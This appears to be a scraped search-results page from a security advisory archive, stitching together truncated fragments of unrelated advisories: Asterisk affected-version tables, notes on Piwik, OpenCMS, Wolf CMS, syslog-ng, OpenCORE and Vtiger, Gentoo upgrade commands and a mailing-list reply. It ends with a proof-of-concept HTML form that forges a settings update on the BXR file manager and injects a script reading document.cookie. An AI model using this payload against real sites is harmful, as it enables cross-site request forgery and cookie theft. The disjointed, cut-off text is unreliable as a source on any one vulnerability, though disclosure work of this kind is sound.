<< Previous Next >>
Open Source
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.0.x | None |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.2.x | None |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.4.x | 1.4.14 and previous |
| | | versions |
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release Series | |
|-------------------------------+----------------+-----------------------|
| Asterisk Open Source | 1.2.x | Unaffected |
|-------------------------------+----------------+-----------------------|
| Asterisk Open Source | 1.4.x | Unaffected |
|-------------------------------+----------------+-----------------------|
| Asterisk Open Source | 1.6.x | All 1.6.1 versions |
|-------------------------------+----------------+-----------------------|
Overview:
Quote from http://www.piwik.org
"Piwik is a downloadable, open source (GPL licensed) web analytics
software program. It provides you with detailed real time reports
on your website visitors: the search engines and keywords they
used, the language they speak, your popular pages… and so much more.
Piwik aims to be an open source alternative to Google Analytics."
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release Series | |
|----------------------------------+----------------+--------------------|
| Asterisk Open Source | 1.6.x | All versions |
|----------------------------------+----------------+--------------------|
| Asterisk Business Edition | C.3 | All versions |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release Series | |
|---------------------------------+----------------+---------------------|
| Asterisk Open Source | 1.2.x | 1.2.26-1.2.30.3 |
|---------------------------------+----------------+---------------------|
| Asterisk Open Source | 1.4.x | Unaffected |
|---------------------------------+----------------+---------------------|
| Asterisk Open Source | 1.6.x | Unaffected |
|---------------------------------+----------------+---------------------|
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release Series | |
|-------------------------------+----------------+-----------------------|
| Asterisk Open Source | 1.2.x | Unaffected |
|-------------------------------+----------------+-----------------------|
| Asterisk Open Source | 1.4.x | Unaffected |
|-------------------------------+----------------+-----------------------|
| Asterisk Open Source | 1.6.x | All 1.6.1 versions |
|-------------------------------+----------------+-----------------------|
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | Since this is a minor issue, a new release is not |
| | immediately planned. However, the issue will be fixed in |
| | Asterisk Open Source version 1.4.12 when it is released. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
Affected Versions
Product Release Series
Asterisk Open Source 1.6.1.x All versions
Asterisk Open Source 1.6.2.x All versions
Asterisk Open Source 1.8.x All versions
Affected Versions
Product Release Series
Asterisk Open Source 1.6.1.x All versions
Asterisk Open Source 1.6.2.x All versions
Asterisk Open Source 1.8.x All versions
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release Series | |
|----------------------------------+----------------+--------------------|
| Asterisk Open Source | 1.4.x | All versions |
|----------------------------------+----------------+--------------------|
| Asterisk Open Source | 1.6.2.x | All versions |
|----------------------------------+----------------+--------------------|
| Asterisk Open Source | 1.8.x | All versions |
|----------------------------------+----------------+--------------------|
"Corrected In" section, or apply a patch specified in the
"Patches" section.
Affected Versions
Product Release Series
Asterisk Open Source 1.8.x All versions
Asterisk Open Source 10.x All versions
Corrected In
Product Release
Asterisk Open Source 1.8.10.1
Resolution Asterisk now performs checks against manager commands that
cause these behaviors for each of the affected actions.
Affected Versions
Product Release Series
Asterisk Open Source 1.6.2.x All versions
Asterisk Open Source 1.8.x All versions
Asterisk Open Source 10.x All versions
Asterisk Business Edition C.3.x All versions
Corrected In
Resolution The length of the buffer is now checked before appending a
value to the end of the buffer.
Affected Versions
Product Release Series
Asterisk Open Source 1.6.2.x All Versions
Asterisk Open Source 1.8.x All Versions
Asterisk Open Source 10.x All Versions
Corrected In
Product Release
# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/virtualbox-bin-3.0.12"
All users of the Open Source version of VirtualBox should upgrade to
the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/virtualbox-ose-3.0.12"
Hi Pete,
if this becomes an ISO standard will it still be available for free, or
will you need to pay to get copies of it like you do for other ISO
standards? Also, once the ISO standard is defined, how will new open
source contributions be incorporated?
Pete Herzog wrote:
> The security community may be interested in this:
>
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#######################################################################
#
# CVE ID : CVE-2009-4505
# Product: OpenCMS OAMP Comments Module
# Vendor: Open Source, Alkacon GmbH (Cologne, Germany)
# Subject: Cross-site scripting (XSS)
# Risk: High
# Effect: Anonymously exploitable
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date: March 24th 2010
Introduction:
=============
Wolf CMS is a content management system and is Free Software published under the GNU General
Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS.
The project was a finalistin the 2010 Packt Publishing s Open Source awards for the Most Promising
Open Source Project category. As of the 28th of December 2010, the Wolf CMS code repository was moved
from Google Code to Github.
( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS )
multi-platform syslog-replacement application developed by BalaBit IT
Security.
BACKGROUND:
Earlier versions of syslog-ng Open Source Edition and syslog-ng Premium
Edition were vulnerable to a possible Denial of Service. The latest
release (2.0.6 for syslog-ng, 2.1.8 for syslog-ng Premium Edition) fixes a
segmentation fault which occurred when the timestamp of the incoming
messages did not end with a space character (NULL pointer dereference).
This is an easy Denial of Service possibility.
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|-------------------------------+------------+---------------------------|
| Asterisk Open Source | 1.0.x | All versions |
|-------------------------------+------------+---------------------------|
| Asterisk Open Source | 1.2.x | All versions prior to |
| | | 1.2.29 |
|-------------------------------+------------+---------------------------|
| Asterisk Open Source | 1.4.x | Not Affected |
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------+-------------+-----------------------------------|
| Asterisk Open Source | 1.0.x | All versions |
|----------------------+-------------+-----------------------------------|
| Asterisk Open Source | 1.2.x | All versions prior to |
| | | asterisk-addons-1.2.8 |
|----------------------+-------------+-----------------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
#2009-002 OpenCORE insufficient bounds checking during MP3 decoding
Description:
OpenCORE, an open source multimedia decoding subsystem, suffers from an
integer underflow during Huffman decoding resulting in improper bounds
checking when writing to a heap allocated buffer. Decoding a specially
crafted mp3 file will result in unexpected process termination or,
potentially, arbitrary code execution due to heap corruption.
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.2.x | Unaffected |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.4.x | Unaffected |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.6.x | All 1.6.0, 1.6.1 and 1.6.2 |
| | | releases |
Alessandro "jekil" Tanasi (alessandro AT tanasi DOT it)
Date 20101116
I. BACKGROUND
Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.
II. DESCRIPTION
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+---------+-------------------------------|
| Asterisk Open Source | 1.0.x | All versions |
|------------------------------+---------+-------------------------------|
| Asterisk Open Source | 1.2.x | All versions prior to 1.2.27 |
|------------------------------+---------+-------------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.18.1 and 1.4.19-rc3 |
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release Series | |
|-----------------------------------+----------------+-------------------|
| Asterisk Open Source | 1.0.x | N/A |
|-----------------------------------+----------------+-------------------|
| Asterisk Open Source | 1.2.x | N/A |
|-----------------------------------+----------------+-------------------|
| Asterisk Open Source | 1.4.x | N/A |
|-----------------------------------+----------------+-------------------|
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.0.x | Not affected |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.2.x | Not affected |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.10 |
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.0.x | Unaffected |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.2.x | Unaffected |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.17 |
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.0.x | N/A |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.2.x | N/A |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.4.x | N/A |
|----------------------------------+-------------+-----------------------|
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.0.x | N/A |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.2.x | N/A |
|----------------------------------+-------------+-----------------------|
| Asterisk Open Source | 1.4.x | N/A |
|----------------------------------+-------------+-----------------------|
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/settings/update_settings" method="post" name="main" >
<input type="hidden" name="setting[site_title]" value='BXR File Management System"><script>alert(document.cookie)</script>' />
<input type="hidden" name="setting[site_keywords]" value="BXR, Open Source File Management System" />
<input type="hidden" name="setting[site_description]" value="The Free, Open Source, Ruby on Rails File Management System." />
<input type="hidden" name="setting[let_users_change_default_folder]" value="0" />
<input type="hidden" name="setting[use_ferret]" value="0" />
<input type="hidden" name="setting[overwrite_existing_files]" value="0" />
<input type="hidden" name="commit" value="Update Settings" />
<<Previous Next>>
|
